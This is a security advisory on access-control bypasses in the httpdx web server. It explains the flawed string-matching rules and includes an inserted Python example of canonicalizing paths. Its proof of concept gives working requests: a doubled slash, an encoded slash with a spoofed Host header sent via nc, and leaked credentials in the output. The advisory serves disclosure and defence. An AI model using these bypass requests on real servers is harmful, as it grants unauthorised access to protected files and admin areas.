httpdx multiple access control bypass
Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with only a few threads. Includes directory listing, virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc. All settings in one config/script file. [ Taken from: http://sourceforge.net/projects/httpdx/ ]
Vulnerability description
Access control in httpdx is done with string matching directives in the configuration file. Request variables are compared to static strings to determine if access should be granted. Examples provided in the default configuration include:
if<%REQUEST_URI% == "/data/users.txt*">{
http.deny = 1;
}
And another example:
if<%REQUEST_URI% == "/admin.html*">{
http.auth = { //authorization needed for admin's section
user="admin",
pass="passw000",
realm="Stuff for admin only!"
};
As long as your request does not literally match these static strings, but the path still resolves to the same file, you can access the content.
Additionally, as the server doesn’t support traditional binding of virtual hosts to network interfaces, you must configure virtual host specific behaviour through similar string matching directives.
if<%HTTP_HOST% != "127.0.0.1" && %HTTP_HOST% == {localhost,127.*.*.*}>{
The variable HTTP_HOST is set from the Host: header in the request, so in order to access the localhost virtualhost remotely, just set your Host: header to localhost.
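As an added illustration (not part of the original advisory or of httpdx's own code), the following Python model contrasts a literal string match like the one httpdx applies with the same rules applied after the request path has been canonicalized. The rule semantics (a trailing `*` meaning prefix match), the canonicalization steps, and the sample request URIs are assumptions made for this example.

```python
import posixpath
from urllib.parse import unquote

# Rules in the spirit of the httpdx defaults shown above (assumed semantics:
# a trailing '*' means "prefix match", otherwise exact match).
DENY_RULES = ["/data/users.txt*", "/admin.html*"]


def literal_match(request_uri, pattern):
    """Compare the raw REQUEST_URI against a rule, as a string-matching
    directive would, without any interpretation of the path."""
    if pattern.endswith("*"):
        return request_uri.startswith(pattern[:-1])
    return request_uri == pattern


def canonical_path(request_uri):
    """Reduce a request URI to the path the file system will actually resolve:
    drop the query string, percent-decode until stable (so double encoding such
    as %252f is also unwrapped), collapse duplicate slashes and resolve '.' and
    '..' segments. Access rules are then applied to this canonical form."""
    path = request_uri.split("?", 1)[0]
    previous = None
    while previous != path:
        previous, path = path, unquote(path)
    # Strip all leading slashes before normpath: POSIX normpath keeps a
    # leading '//' intact, which would defeat the prefix match below.
    return posixpath.normpath("/" + path.lstrip("/"))


def is_denied(request_uri, rules=DENY_RULES, canonicalize=True):
    """Return True if any rule matches; with canonicalize=False this behaves
    like the literal match the advisory describes, with True like a hardened
    check that normalizes before matching."""
    target = canonical_path(request_uri) if canonicalize else request_uri
    return any(literal_match(target, rule) for rule in rules)


if __name__ == "__main__":
    # Constructed sample requests: the two bypass shapes from the advisory
    # plus a dot-segment variant and a harmless request.
    for uri in ["/data//users.txt", "/%2fadmin.html",
                "/data/../data/users.txt", "/index.html"]:
        print(f"{uri:28} literal={is_denied(uri, canonicalize=False)!s:5} "
              f"canonical={is_denied(uri)}")
```

The literal check lets the first three requests through while the canonicalized check denies them, which is the property an access control layer in front of a file system must have.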
- Discovered by: Eldar “Wireghoul” Marcussen
- Vendor: httpdx - http://sourceforge.net/projects/httpdx/
- Affected versions: 1.5.5, 1.5.4 and probably earlier versions
Proof of Concept
The server comes with two examples of access control, a restricted file and a password protected administrator area running on localhost. The following examples successfully access these restricted areas remotely:
Access user file:
user@~$ GET http://192.168.58.135/data//users.txt
user1=pass123
user2=pass321
Access admin console:
user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 192.168.58.135 80
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2012 03:25:58 GMT
Content-Type: text/html
Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
Content-Length: 36
Connection: close
Server: httpdx/1.5.4 (Win32)
Pragma: no-cache
Ok, you’re now at admin’s section.
Solution
The software appears to be abandoned, and the same versions suffer from remote code execution bugs. Use different software instead.
Disclosure time line
- 12-Feb-2013 - Public disclosure